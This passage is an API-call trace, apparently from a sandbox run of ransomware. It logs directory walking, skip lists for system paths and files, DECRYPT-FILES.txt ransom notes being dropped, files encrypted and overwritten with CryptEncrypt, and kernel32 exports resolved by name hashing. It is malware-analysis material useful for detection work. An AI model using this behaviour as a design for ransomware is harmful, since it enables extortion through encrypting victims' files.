lpString1="IETldCache\\") returned="IETldCache\\" [0079.763] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IETldCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\" [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Program Files") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch=":\\Windows") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Games\\") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\All Users") returned 0x0 [0079.763] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\IETldCache\\") returned="\\IETldCache\\" [0079.763] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab1e24a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab1e24a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab1e24a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.763] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.763] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.763] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.763] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.764] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.764] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.764] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.764] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.764] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.764] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0079.764] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.764] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\" [0079.764] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\jkbimi8.tmp" [0079.764] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.764] CloseHandle (hObject=0x0) returned 0 [0079.764] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.765] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d22d5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0079.765] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0079.765] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0079.765] lstrcatW (in: lpString1="Libraries", lpString2="\\" | out: lpString1="Libraries\\") returned="Libraries\\" [0079.765] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Program Files") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch=":\\Windows") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Games\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\All Users") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="AhnLab") returned 0x0 [0079.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.765] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.765] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.765] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\jkbimi8.tmp") returned 86 [0079.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0079.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.766] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.766] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt") returned 92 [0079.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0079.767] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0079.768] CloseHandle (hObject=0x454) returned 1 [0079.768] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.769] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0079.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0079.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.769] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.769] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbda0c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.769] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.769] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0079.769] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0079.769] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0079.769] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0079.769] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0079.769] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d1e12e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="autorun.inf") returned 1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="boot.ini") returned 1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="desktop.ini") returned 1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="ntuser.dat") returned -1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="iconcache.db") returned -1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="bootsect.bak") returned 1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="ntuser.dat.log") returned -1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="thumbs.db") returned -1 [0079.769] lstrcmpiW (lpString1="Documents.library-ms", lpString2="Bootfont.bin") returned 1 [0079.769] lstrlenW (lpString="Documents.library-ms") returned 20 [0079.769] lstrcmpiW (lpString1="library-ms", lpString2="lnk") returned -1 [0079.769] lstrcmpiW (lpString1="library-ms", lpString2="exe") returned 1 [0079.769] lstrcmpiW (lpString1="library-ms", lpString2="sys") returned -1 [0079.769] lstrcmpiW (lpString1="library-ms", lpString2="dll") returned 1 [0079.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.770] lstrlenW (lpString="Documents.library-ms") returned 20 [0079.770] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0079.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Documents.library-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" [0079.770] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0079.770] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3627) returned 1 [0079.770] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0079.770] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.770] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.770] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.770] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.771] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0079.771] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.771] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.772] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.772] CloseHandle (hObject=0x45c) returned 1 [0079.772] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.772] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0079.773] CloseHandle (hObject=0x0) returned 0 [0079.773] CloseHandle (hObject=0x458) returned 1 [0079.774] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.774] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.774] GetTickCount () returned 0x114c6e8 [0079.774] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.775] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.775] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.775] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.775] lstrlenA (lpString="kernel32.dll") returned 12 [0079.776] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.776] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.776] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.776] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.776] lstrlenA (lpString="ADDATOMA") returned 8 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.776] lstrlenA (lpString="ADDATOMW") returned 8 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.776] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.776] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.776] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.776] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.776] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.776] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.776] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.776] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.776] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.776] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.777] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.777] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.777] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.777] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.777] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.777] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.777] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.777] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.777] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.777] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.777] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.777] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.777] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.777] lstrcpyA (in: 